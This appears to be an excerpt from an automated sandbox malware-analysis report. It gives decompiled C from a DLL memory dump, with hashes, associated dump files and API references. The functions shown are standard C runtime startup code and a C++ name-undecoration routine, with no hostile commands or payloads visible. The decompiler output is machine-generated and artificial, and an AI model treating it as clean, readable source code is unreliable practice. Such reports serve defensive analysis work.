Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: e91f5b7b03177e293ea57dddd1f04cdb7539a8f84eced3c547e38db6aad20869
Instruction ID: 0ae422b36041c862007eb23f6d7c18c72da5a4f53a0f078e305bdb83fdc6d92b
Opcode Fuzzy Hash: e91f5b7b03177e293ea57dddd1f04cdb7539a8f84eced3c547e38db6aad20869
Instruction Fuzzy Hash: 1C21E272D41215AFCB618FD5C845EAF3A7DEB90B94F224415F8285B210E7318DC9BBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E19A48F, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E19A48F(void* __ecx, void* __edx) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				char _t84;
				signed int _t85;
				void* _t88;
				void* _t89;
				void* _t101;
				void* _t105;
				signed int _t109;
				void* _t112;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t120;
				void* _t122;

				_t104 = __edx;
				_t88 = __ecx;
				E6E19AAE0(0x6e210198, 0x10);
				_t43 = E6E19A1FD(_t88, __edx, 0); // executed
				_pop(_t89);
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t122 - 0x1d)) = E6E19A102();
					_t84 = 1;
					 *((char*)(_t122 - 0x19)) = 1;
					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
					_t130 =  *0x6e212c90;
					if( *0x6e212c90 != 0) {
						E6E19AE86(_t104, _t105, _t112, 7);
						asm("int3");
						E6E19AAE0(0x6e2101b8, 0x10);
						_t48 =  *0x6e212cb4; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6e212cb4 = _t48 - 1;
							 *(_t122 - 0x1c) = 1;
							 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
							 *((char*)(_t122 - 0x20)) = E6E19A102();
							 *(_t122 - 4) = 1;
							__eflags =  *0x6e212c90 - 2;
							if( *0x6e212c90 != 2) {
								E6E19AE86(_t104, 1, _t112, 7);
								asm("int3");
								E6E19AAE0(0x6e2101e0, 0xc);
								_t109 =  *(_t122 + 0xc);
								__eflags = _t109;
								if(_t109 != 0) {
									L23:
									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										L26:
										_t85 =  *(_t122 + 0x10);
										_t114 = E6E19A751( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
										 *(_t122 - 0x1c) = _t114;
										__eflags = _t114;
										if(_t114 != 0) {
											_t55 = E6E19A43C(_t89, _t104,  *((intOrPtr*)(_t122 + 8)), _t109, _t85); // executed
											_t114 = _t55;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t114;
											if(_t114 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t109 - 2;
										if(_t109 == 2) {
											goto L26;
										} else {
											_t85 =  *(_t122 + 0x10);
											L28:
											_t114 = E6E1CD9E0(_t85,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t109 - 1;
											if(_t109 == 1) {
												__eflags = _t114;
												if(_t114 == 0) {
													_t59 = E6E1CD9E0(_t85,  *((intOrPtr*)(_t122 + 8)), _t56, _t85);
													__eflags = _t85;
													_t34 = _t85 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t89);
													E6E19A751( *((intOrPtr*)(_t122 + 8)), _t114, _t85);
												}
											}
											__eflags = _t109;
											if(_t109 == 0) {
												L33:
												_t114 = E6E19A43C(_t89, _t104,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
												 *(_t122 - 0x1c) = _t114;
												__eflags = _t114;
												if(_t114 != 0) {
													_t114 = E6E19A751( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
													 *(_t122 - 0x1c) = _t114;
												}
											} else {
												__eflags = _t109 - 3;
												if(_t109 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t122 - 4) = 0xfffffffe;
									_t54 = _t114;
								} else {
									__eflags =  *0x6e212cb4 - _t109; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
								return _t54;
							} else {
								E6E19A1CD(_t89);
								E6E19B12F();
								E6E19B190();
								 *0x6e212c90 =  *0x6e212c90 & 0x00000000;
								 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
								E6E19A62B();
								_t67 = E6E19A36E( *((intOrPtr*)(_t122 + 8)), 0);
								asm("sbb esi, esi");
								_t118 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t118;
								 *(_t122 - 0x1c) = _t118;
								 *(_t122 - 4) = 0xfffffffe;
								E6E19A638();
								_t69 = _t118;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
							return _t69;
						}
					} else {
						 *0x6e212c90 = 1;
						if(E6E19A15F(_t130) != 0) {
							E6E19B123(E6E19B164());
							E6E19B141();
							_t80 = E6E1AF3FA(0x6e204240, 0x6e204250);
							_pop(_t101);
							if(_t80 == 0 && E6E19A134(1, _t101) != 0) {
								E6E1AF3B5(_t101, 0x6e204230, 0x6e20423c);
								 *0x6e212c90 = 2;
								_t84 = 0;
								 *((char*)(_t122 - 0x19)) = 0;
							}
						}
						 *(_t122 - 4) = 0xfffffffe;
						E6E19A572();
						if(_t84 != 0) {
							goto L11;
						} else {
							_t120 = E6E19B15E();
							if( *_t120 != 0) {
								_push(_t120);
								if(E6E19A2BD() != 0) {
									 *0x6e204228( *((intOrPtr*)(_t122 + 8)), 2,  *(_t122 + 0xc));
									 *((intOrPtr*)( *_t120))();
								}
							}
							 *0x6e212cb4 =  *0x6e212cb4 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
						return _t44;
					}
				}
			}

0x6e19a48f
0x6e19a48f
0x6e19a496
0x6e19a49d
0x6e19a4a2
0x6e19a4a5
0x6e19a57c
0x6e19a57c
0x6e19a57c
0x00000000
0x6e19a4ab
0x6e19a4b0
0x6e19a4b3
0x6e19a4b5
0x6e19a4b8
0x6e19a4bc
0x6e19a4c3
0x6e19a590
0x6e19a595
0x6e19a59d
0x6e19a5a2
0x6e19a5a7
0x6e19a5a9
0x6e19a5b0
0x6e19a5b8
0x6e19a5bb
0x6e19a5c4
0x6e19a5c7
0x6e19a5ca
0x6e19a5d1
0x6e19a640
0x6e19a645
0x6e19a64d
0x6e19a652
0x6e19a655
0x6e19a657
0x6e19a668
0x6e19a668
0x6e19a66c
0x6e19a66f
0x6e19a67b
0x6e19a67b
0x6e19a688
0x6e19a68a
0x6e19a68d
0x6e19a68f
0x6e19a69a
0x6e19a69f
0x6e19a6a1
0x6e19a6a4
0x6e19a6a6
0x00000000
0x00000000
0x6e19a6a6
0x6e19a671
0x6e19a671
0x6e19a674
0x00000000
0x6e19a676
0x6e19a676
0x6e19a6ac
0x6e19a6b6
0x6e19a6b8
0x6e19a6bb
0x6e19a6be
0x6e19a6c0
0x6e19a6c2
0x6e19a6c9
0x6e19a6ce
0x6e19a6d0
0x6e19a6d0
0x6e19a6d6
0x6e19a6d7
0x6e19a6dc
0x6e19a6e2
0x6e19a6e2
0x6e19a6c2
0x6e19a6e7
0x6e19a6e9
0x6e19a6f0
0x6e19a6fa
0x6e19a6fc
0x6e19a6ff
0x6e19a701
0x6e19a70d
0x6e19a735
0x6e19a735
0x6e19a6eb
0x6e19a6eb
0x6e19a6ee
0x00000000
0x00000000
0x6e19a6ee
0x6e19a6e9
0x6e19a674
0x6e19a738
0x6e19a73f
0x6e19a659
0x6e19a659
0x6e19a65f
0x00000000
0x6e19a661
0x6e19a661
0x6e19a661
0x6e19a65f
0x6e19a744
0x6e19a750
0x6e19a5d3
0x6e19a5d3
0x6e19a5d8
0x6e19a5dd
0x6e19a5e2
0x6e19a5e9
0x6e19a5ed
0x6e19a5f7
0x6e19a603
0x6e19a605
0x6e19a605
0x6e19a607
0x6e19a60a
0x6e19a611
0x6e19a616
0x00000000
0x6e19a616
0x6e19a5ab
0x6e19a5ab
0x6e19a618
0x6e19a61b
0x6e19a627
0x6e19a627
0x6e19a4c9
0x6e19a4c9
0x6e19a4da
0x6e19a4e1
0x6e19a4e6
0x6e19a4f5
0x6e19a4fb
0x6e19a4fe
0x6e19a513
0x6e19a51a
0x6e19a524
0x6e19a526
0x6e19a526
0x6e19a4fe
0x6e19a529
0x6e19a530
0x6e19a537
0x00000000
0x6e19a539
0x6e19a53e
0x6e19a543
0x6e19a545
0x6e19a54e
0x6e19a55c
0x6e19a562
0x6e19a562
0x6e19a54e
0x6e19a564
0x6e19a56c
0x6e19a56c
0x6e19a57e
0x6e19a581
0x6e19a58d
0x6e19a58d
0x6e19a4c3

APIs

__RTC_Initialize.LIBCMT ref: 6E19A4DC

Part of subcall function 6E19B123: InitializeSListHead.KERNEL32(6E212FE8,6E19A4E6,6E210198,00000010,6E19A477,?,?,?,6E19A69F,?,00000001,?,?,00000001,?,6E2101E0), ref: 6E19B128

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E19A546
___scrt_fastfail.LIBCMT ref: 6E19A590

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 07ed64884e4451f3f8af8ad2ca7c7f6c5fab281e0e81f274655b5aea3d2650a0
Instruction ID: e7361e496c12c816e5ebcae3fbe56c96ccefc4fb3d8ab64ad308bb534aa91e30
Opcode Fuzzy Hash: 07ed64884e4451f3f8af8ad2ca7c7f6c5fab281e0e81f274655b5aea3d2650a0
Instruction Fuzzy Hash: 7621F3B2F442059FEB40DBF4A415BDC37669F2632CF204829EA912B2C1CF2101C9F665

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E19DBDC, Relevance: 64.1, APIs: 32, Strings: 4, Instructions: 1115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6E19DBDC(signed int* _a4, signed int* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				signed int _v52;
				char* _v56;
				signed int _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char* _v96;
				signed int _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				void* __ebx;
				void* __edi;
				intOrPtr _t404;
				signed int _t406;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t418;
				signed int _t421;
				signed int _t422;
				signed int _t424;
				intOrPtr* _t427;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				signed int _t434;
				signed int* _t435;
				unsigned int _t446;
				signed char _t448;
				unsigned int _t449;
				signed char _t451;
				signed int _t457;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t496;
				signed int _t500;
				signed int _t507;
				signed int _t514;
				signed int _t519;
				signed int _t524;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed char _t543;
				signed int* _t547;
				signed int _t548;
				intOrPtr* _t550;
				signed int _t552;
				unsigned int _t559;
				signed char _t561;
				void* _t563;
				unsigned int _t568;
				signed char _t570;
				unsigned int _t577;
				signed char _t579;
				signed int _t583;
				void* _t586;
				void* _t602;
				char** _t614;
				void* _t618;
				void* _t622;
				intOrPtr* _t625;
				signed int _t627;
				signed int* _t632;
				signed int _t638;
				signed int _t642;
				void* _t655;
				signed char _t670;
				signed char _t673;
				char** _t678;
				void* _t681;
				intOrPtr* _t689;
				intOrPtr* _t692;
				signed int* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t700;
				signed int _t701;
				signed int _t706;
				signed int _t717;
				signed int _t719;
				signed int _t724;
				signed int _t726;
				signed int _t727;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t742;
				signed int _t745;
				signed int _t748;
				signed int _t750;
				signed int _t761;
				unsigned int _t762;
				signed int _t770;
				char** _t793;
				signed char _t811;
				void* _t830;
				signed int _t833;
				unsigned int _t844;
				signed int* _t853;
				signed int _t854;
				signed int _t855;
				signed int _t861;
				signed int _t863;
				void* _t864;
				signed int _t867;
				signed int _t868;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t875;
				signed int _t879;
				signed int _t881;
				void* _t884;

				_t404 =  *0x6e21304c; // 0x0
				_t867 = 0;
				_v100 = _t404 -  *0x6e213050;
				_v20 = 0;
				_v16 = 0;
				_t406 = E6E1A296E();
				_t853 = _a8;
				_t696 = _t406;
				_t697 =  *_t853;
				if(_t697 == 0) {
					L2:
					_v92 = _t867;
					L3:
					if(_t696 == 0xffff) {
						_t695 = _a4;
						_t695[1] = _t867;
						_t695[1] = 2;
						 *_t695 = _t867;
						return _t695;
					}
					__eflags = _t696 - 0xfffe;
					if(_t696 == 0xfffe) {
						E6E19D85E(_t697, _a4, 1, _t853);
						return _a4;
					}
					__eflags = _t696 - 0xfffd;
					if(_t696 == 0xfffd) {
						_t692 = _a4;
						 *_t692 = _t697;
						_t16 = _t853 + 4; // 0x4488b0f
						 *((intOrPtr*)(_t692 + 4)) =  *_t16;
						return _t692;
					}
					_t871 = _t696 & 0x00008000;
					__eflags = _t871;
					_v40 = _t871;
					if(_t871 == 0) {
						L98:
						E6E19D99C( &_v20, _t853);
						__eflags = _t871;
						if(_t871 != 0) {
							L104:
							__eflags = (_t696 & 0x0000fc00) - 0x7c00;
							if(__eflags != 0) {
								_t868 = _v40;
								_t872 = _t696;
								_t854 = _t696;
								__eflags = _t868;
								if(__eflags == 0) {
									_t855 = _t854 & 0x00006000;
									_t412 = 0;
									_t413 = _t412 & 0xffffff00 | __eflags == 0x00000000;
									_t873 = _t872 & 0x00001800;
									__eflags = _t873;
								} else {
									_t873 = _t872 & 0x00001800;
									__eflags = _t873 - 0x800;
									_t413 = 0 | _t873 == 0x00000800;
									_t855 = _t854 & 0x00006000;
								}
								__eflags = _t413;
								_v28 = _t855;
								_t700 = _t696;
								_t414 = _t696;
								if(_t413 == 0) {
									_t415 = _t414 & 0x00001000;
									_t701 = _t700 & 0x00000400;
									__eflags = _t701;
									_v40 = _t701;
									_v36 = _t415;
								} else {
									_t415 = _t414 & 0x00000400;
									_v40 = _t415;
									_v36 = _t700 & 0x00001000;
								}
								__eflags = _t415;
								if(_t415 == 0) {
									L117:
									__eflags = _t868;
									if(_t868 == 0) {
										__eflags = _t855;
									} else {
										__eflags = _t873 - 0x800;
									}
									__eflags = 0 | __eflags == 0x00000000;
									_t418 = _v40;
									if(__eflags == 0) {
										_t418 = _v36;
									}
									__eflags = _t418;
									if(_t418 == 0) {
										L125:
										__eflags = _t868;
										if(_t868 == 0) {
											__eflags = _t855;
										} else {
											__eflags = _t873 - 0x800;
										}
										__eflags = 0 | __eflags == 0x00000000;
										_t421 = _v40;
										if(__eflags == 0) {
											_t421 = _v36;
										}
										__eflags = _t421;
										if(_t421 == 0) {
											L141:
											__eflags = _t868;
											if(_t868 != 0) {
												goto L134;
											}
											__eflags = (_t696 & 0x00007c00) - 0x7800;
											if((_t696 & 0x00007c00) == 0x7800) {
												goto L223;
											}
											goto L143;
										} else {
											asm("sbb eax, eax");
											_t507 =  ~((_t696 & 0x00001b00) - 0x1200) + 1;
											_t745 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t507 & _t745;
											if((_t507 & _t745) == 0) {
												goto L141;
											}
											_v12 = "`template static data member destructor helper\'";
											_v8 = 0x2f;
											goto L133;
										}
									} else {
										asm("sbb eax, eax");
										_t514 =  ~((_t696 & 0x00001b00) - 0x1100) + 1;
										_t748 =  ~_t868;
										asm("sbb ecx, ecx");
										__eflags = _t514 & _t748;
										if((_t514 & _t748) == 0) {
											goto L125;
										}
										_v12 = "`template static data member constructor helper\'";
										_v8 = 0x30;
										goto L133;
									}
								} else {
									asm("sbb eax, eax");
									_t519 =  ~((_t696 & 0x00001b00) - 0x1000) + 1;
									_t750 =  ~_t868;
									asm("sbb ecx, ecx");
									__eflags = _t519 & _t750;
									if((_t519 & _t750) == 0) {
										goto L117;
									}
									_v12 = "`local static destructor helper\'";
									_v8 = 0x20;
									L133:
									E6E19D944( &_v20,  &_v12);
									__eflags = _t868;
									if(_t868 == 0) {
										L143:
										_t422 = 0;
										__eflags = _v28;
										L135:
										__eflags = _t422 & 0xffffff00 | __eflags == 0x00000000;
										_t424 = _v40;
										if(__eflags == 0) {
											_t424 = _v36;
										}
										__eflags = _t424;
										if(_t424 == 0) {
											L144:
											_t427 = E6E1A05F7(_t696,  &_v48,  &_v20);
											goto L145;
										} else {
											_t863 = _t696 & 0x00001b00;
											__eflags = _t863 - 0x1100;
											_t496 = 0 | _t863 == 0x00001100;
											_t742 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t496 & _t742;
											if((_t496 & _t742) != 0) {
												L140:
												_t427 = E6E19D833(_t742,  &_v48, 0x20,  &_v20);
												L145:
												_v16 =  *((intOrPtr*)(_t427 + 4));
												_v20 =  *_t427;
												__eflags = _t868;
												if(__eflags == 0) {
													_t706 = _t696 & 0x00006000;
													_t429 = 0;
													_t430 = _t429 & 0xffffff00 | __eflags == 0x00000000;
													_t875 = _t696 & 0x00001800;
													__eflags = _t875;
													goto L148;
												}
												goto L146;
											}
											__eflags = _t863 - 0x1200;
											_t500 = 0 | _t863 == 0x00001200;
											_t742 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t500 & _t742;
											if((_t500 & _t742) == 0) {
												goto L144;
											}
											goto L140;
										}
									}
									L134:
									_t422 = 0;
									__eflags = _t873 - 0x800;
									goto L135;
								}
							}
							E6E1A2FA8(0x7c00, _t853, __eflags, _a4,  &_v20);
							L106:
							L107:
							_t435 = _a4;
							goto L224;
						}
						_t524 = _t696 & 0x00007c00;
						__eflags = _t524 - 0x6800;
						if(_t524 == 0x6800) {
							L103:
							E6E1A3009(_a4,  &_v20);
							goto L106;
						}
						__eflags = _t524 - 0x7000;
						if(_t524 == 0x7000) {
							goto L103;
						}
						__eflags = _t524 - 0x6000;
						if(_t524 != 0x6000) {
							goto L104;
						}
						_v12 = _v20;
						_v56 = "}\'";
						_v52 = 2;
						_v8 = _v16;
						E6E19D9F3( &_v12, 0x7b);
						E6E1A0004(_t853, _t867,  &_v80, _t867);
						E6E19D880(E6E19D8A2( &_v12,  &_v48,  &_v80), _a4,  &_v56);
						goto L107;
					} else {
						_t536 = _t696;
						_t761 = _t696 & 0x00001800;
						_v36 = _t761;
						__eflags = _t761 - 0x800;
						if(_t761 != 0x800) {
							_t537 = _t536 & 0x00001000;
							_v24 = _t696;
							_t25 =  &_v24;
							 *_t25 = _v24 & 0x00000400;
							__eflags =  *_t25;
							_v68 = _t537;
						} else {
							_t537 = _t536 & 0x00000400;
							_v68 = _t696;
							_v68 = _v68 & 0x00001000;
							_v24 = _t537;
						}
						__eflags = _t537;
						_t538 = _t696;
						if(_t537 == 0) {
							L16:
							_t539 = _t538 & 0x00001b00;
							__eflags = _t761 - 0x800;
							if(_t761 != 0x800) {
								_v60 = _v68;
								_t871 = _v40;
							} else {
								_v60 = _v24;
								_t853 = _a8;
							}
							__eflags = _v60 - _t867;
							if(_v60 == _t867) {
								L22:
								__eflags = _t696 & 0x00004000;
								if((_t696 & 0x00004000) != 0) {
									_t844 =  *0x6e213054; // 0x0
									_t848 =  !((_t844 >> 0x00000002 |  *0x6e213054) >> 1);
									_push( &_v12);
									__eflags =  !((_t844 >> 0x00000002 |  *0x6e213054) >> 1) & 0x00000001;
									if(__eflags == 0) {
										E6E19DB2A( &_v20, E6E19EE83(_t853, __eflags));
									} else {
										_t689 = E6E19D833(_t848,  &_v56, 0x20, E6E19EE83(_t853, __eflags));
										_t884 = _t884 + 0x10;
										_v20 =  *_t689;
										_v16 =  *((intOrPtr*)(_t689 + 4));
									}
									_t853 = _a8;
									_t761 = _v36;
								}
								_t540 = _v24;
								_t879 = _v68;
								_v60 = _t540;
								__eflags = _t761 - 0x800;
								if(_t761 != 0x800) {
									_v60 = _t879;
								}
								__eflags = _v60 - _t867;
								if(_v60 == _t867) {
									L37:
									_t864 = 0x800;
									_v56 = _t867;
									_v52 = _t867;
									_v12 = _t867;
									_v8 = _t867;
									_v88 = _t867;
									_v84 = _t867;
									_v60 = _t867;
									_v24 = _t867;
									_v80 = _t867;
									_v76 = _t867;
									__eflags = _t761 - 0x800;
									if(_t761 != 0x800) {
										_t540 = _t879;
									}
									_t881 = _t696 & 0x00000700;
									__eflags = _t540;
									if(_t540 == 0) {
										L48:
										__eflags = _t761 - _t864;
										if(_t761 == _t864) {
											__eflags = _t881 - 0x200;
											if(_t881 != 0x200) {
												_t627 =  *0x6e213054; // 0x0
												__eflags = (_t627 & 0x00000060) - 0x60;
												_push( &_v32);
												if((_t627 & 0x00000060) == 0x60) {
													E6E19DB2A( &_v80, E6E1A291C());
												} else {
													_t632 = E6E1A291C();
													_v80 =  *_t632;
													_v76 = _t632[1];
												}
											}
										}
										_t762 =  *0x6e213054; // 0x0
										_t543 =  !(_t762 >> 1);
										__eflags = _t543 & 0x00000001;
										_push( &_v32);
										if((_t543 & 0x00000001) == 0) {
											L56:
											E6E19DB2A( &_v20, E6E19F522());
											L57:
											_t547 = _a8;
											_t765 =  *_t547;
											__eflags = _t765;
											if(_t765 == 0) {
												L62:
												_v68 = _t867;
												_v28 = _t867;
												__eflags = _v92 - _t867;
												if(_v92 == _t867) {
													_t548 = E6E1A0BB7(0x6e213068, 8);
													__eflags = _t548;
													if(_t548 != 0) {
														 *_t548 = _t867;
														 *(_t548 + 4) = _t867;
														_t867 = _t548;
													}
													_t550 = E6E1A19E4(_t696,  &_v108, _t867);
													_v68 =  *_t550;
													_v28 =  *((intOrPtr*)(_t550 + 4));
													L68:
													_t552 = _v36;
													_t770 = _t696;
													__eflags = _t552 - 0x800;
													if(_t552 != 0x800) {
														_t771 = _t770 & 0x00001000;
														__eflags = _t771;
													} else {
														_t771 = _t770 & 0x00000400;
													}
													__eflags = _t771;
													if(_t771 == 0) {
														L81:
														__eflags =  *0x6e213064 - 1;
														if( *0x6e213064 == 1) {
															__eflags =  *0x6e213060;
															if( *0x6e213060 == 0) {
																 *0x6e213060 = _v100;
															}
														}
														E6E19D99C( &_v20, E6E19D8C4(E6E19D833(_t771,  &_v116, 0x28, E6E19EB2B( &_v48)),  &_v124, 0x29));
														__eflags = _v36 - 0x800;
														if(_v36 == 0x800) {
															__eflags = (_t696 & 0x00000700) - 0x200;
															if((_t696 & 0x00000700) != 0x200) {
																E6E19D99C( &_v20,  &_v80);
															}
														}
														_t559 =  *0x6e213054; // 0x0
														_t561 =  !(_t559 >> 0x13);
														__eflags = _t561 & 0x00000001;
														_push( &_v48);
														if((_t561 & 0x00000001) == 0) {
															_t563 = E6E1A18BB(0x800);
															_t776 =  &_v20;
															E6E19DB2A( &_v20, _t563);
														} else {
															_t586 = E6E1A18BB(0x800);
															_t776 =  &_v20;
															E6E19D99C( &_v20, _t586);
														}
														E6E19D99C( &_v20, E6E1A0C41(_t776,  &_v48));
														_t568 =  *0x6e213054; // 0x0
														_t570 =  !(_t568 >> 8);
														__eflags = _t570 & 0x00000001;
														_push( &_v48);
														if((_t570 & 0x00000001) == 0) {
															E6E19DB2A( &_v20, E6E1A294B());
														} else {
															E6E19D99C( &_v20, E6E1A294B());
														}
														E6E19DB2A( &_v20, E6E1A011B( &_v48));
														_t577 =  *0x6e213054; // 0x0
														_t579 =  !(_t577 >> 2);
														__eflags = _t579 & 0x00000001;
														if((_t579 & 0x00000001) == 0) {
															goto L97;
														} else {
															__eflags = _t867;
															if(_t867 == 0) {
																goto L97;
															}
															 *_t867 = _v20;
															 *((intOrPtr*)(_t867 + 4)) = _v16;
															_v20 = _v68;
															_t583 = _v28;
															goto L96;
														}
													} else {
														__eflags = _t552 - 0x800;
														if(_t552 != 0x800) {
															L79:
															_v12 = "`adjustor{";
															_v8 = 0xa;
															E6E19D944( &_v20,  &_v12);
															L80:
															_t187 =  &_v12; // 0x6e205354
															_v12 = _v60;
															_v8 = _v24;
															_v56 = "}\' ";
															_v52 = 3;
															E6E19D944(_t187,  &_v56);
															_t194 =  &_v12; // 0x6e205354
															_t771 =  &_v20;
															E6E19D99C( &_v20, _t194);
															goto L81;
														}
														__eflags = _t881 - 0x600;
														if(_t881 != 0x600) {
															__eflags = _t552 - 0x800;
															if(_t552 != 0x800) {
																goto L79;
															}
															__eflags = _t881 - 0x500;
															if(_t881 != 0x500) {
																goto L79;
															}
															_v12 = "`vtordisp{";
															_v8 = 0xa;
															_t602 = E6E19D46F( &_v48,  &_v12);
															_t178 =  &_v12; // 0x6e205348
															E6E19D8A2(_t602, _t178,  &_v88);
															_push(0x2c);
															_push( &_v116);
															_t180 =  &_v12; // 0x6e205348
															_t793 = _t180;
															L78:
															E6E19D99C( &_v20, E6E19D8C4(_t793));
															goto L80;
														}
														_v96 = "`vtordispex{";
														_v92 = 0xc;
														E6E19D8A2(E6E19D46F( &_v108,  &_v96),  &_v96,  &_v56);
														_t614 = E6E19D8A2(E6E19D8C4(E6E19D8A2(E6E19D8C4( &_v96,  &_v132, 0x2c),  &_v140,  &_v12),  &_v124, 0x2c),  &_v116,  &_v88);
														_push(0x2c);
														_push( &_v48);
														_t793 = _t614;
														goto L78;
													}
												}
												_t618 = E6E19D833(_t765,  &_v108, 0x20, E6E1A19E4(_t696,  &_v96, _t867));
												_t884 = _t884 + 0x14;
												E6E19D99C( &_v20, _t618);
												__eflags =  *0x6e213054 & 0x00001000;
												if(( *0x6e213054 & 0x00001000) == 0) {
													goto L68;
												}
												goto L223;
											}
											__eflags = _v20 - _t867;
											if(_v20 == _t867) {
												L61:
												_t142 =  &(_t547[1]); // 0x4488b0f
												_v20 = _t765;
												_v16 =  *_t142;
												goto L62;
											}
											__eflags =  *0x6e213054 & 0x00001000;
											if(( *0x6e213054 & 0x00001000) != 0) {
												goto L61;
											}
											_t622 = E6E19D833(_t765,  &_v32, 0x20, _t547);
											_t884 = _t884 + 0xc;
											_t765 =  &_v20;
											E6E19D99C( &_v20, _t622);
											goto L62;
										}
										_t811 =  !(_t762 >> 4);
										__eflags = _t811 & 0x00000001;
										if((_t811 & 0x00000001) == 0) {
											goto L56;
										}
										_t625 = E6E19D8A2(E6E19F522(),  &_v72,  &_v20);
										_v20 =  *_t625;
										_v16 =  *((intOrPtr*)(_t625 + 4));
										goto L57;
									} else {
										__eflags = _t761 - _t864;
										if(_t761 != _t864) {
											L47:
											E6E1A0004(_t864, _t867,  &_v32, 1);
											_t864 = 0x800;
											_t761 = _v36;
											_v60 = _v32;
											_v24 = _v28;
											goto L48;
										}
										__eflags = _t881 - 0x600;
										if(_t881 != 0x600) {
											_t638 = _t881;
											__eflags = _t761 - _t864;
											if(_t761 != _t864) {
												goto L47;
											}
											__eflags = _t638 - 0x500;
											if(_t638 != 0x500) {
												goto L47;
											}
											E6E1A0004(_t864, _t867,  &_v64, 1);
											_v88 = _v64;
											_t642 = _v60;
											L46:
											_v84 = _t642;
											goto L47;
										}
										E6E1A0004(_t864, _t867,  &_v32, 1);
										_v56 = _v32;
										_v52 = _v28;
										E6E1A0004(_t864, _t867,  &_v32, 1);
										_v12 = _v32;
										_v8 = _v28;
										E6E1A0004(_t864, _t867,  &_v32, 1);
										_t884 = _t884 + 0x18;
										_v88 = _v32;
										_t642 = _v28;
										goto L46;
									}
								} else {
									__eflags = _t761 - 0x1800;
									if(_t761 != 0x1800) {
										goto L37;
									}
									_t655 = E6E19D8C4(_t853,  &_v56, 0x7b);
									E6E1A0004(_t853, _t867,  &_v12, _t867);
									E6E19D99C( &_v20, E6E19D8A2(_t655,  &_v80,  &_v12));
									E6E1A2DBD( &_v20,  &_v56);
									_pop(_t830);
									__eflags =  *0x6e213054 & 0x00001000;
									if(( *0x6e213054 & 0x00001000) == 0) {
										_v12 = "}\' ";
										_v8 = 3;
										_t681 = E6E19D833(_t830,  &_v80, 0x2c,  &_v56);
										_t884 = _t884 + 0xc;
										E6E19D99C( &_v20, E6E19D880(_t681,  &_v88,  &_v12));
									}
									_v12 = "}\'";
									_v8 = 2;
									E6E19D944( &_v20,  &_v12);
									E6E19F522( &_v12);
									_t833 =  *0x6e213054; // 0x0
									_t670 =  !(_t833 >> 1);
									__eflags = _t670 & 0x00000001;
									if((_t670 & 0x00000001) == 0) {
										L97:
										_t868 = _v40;
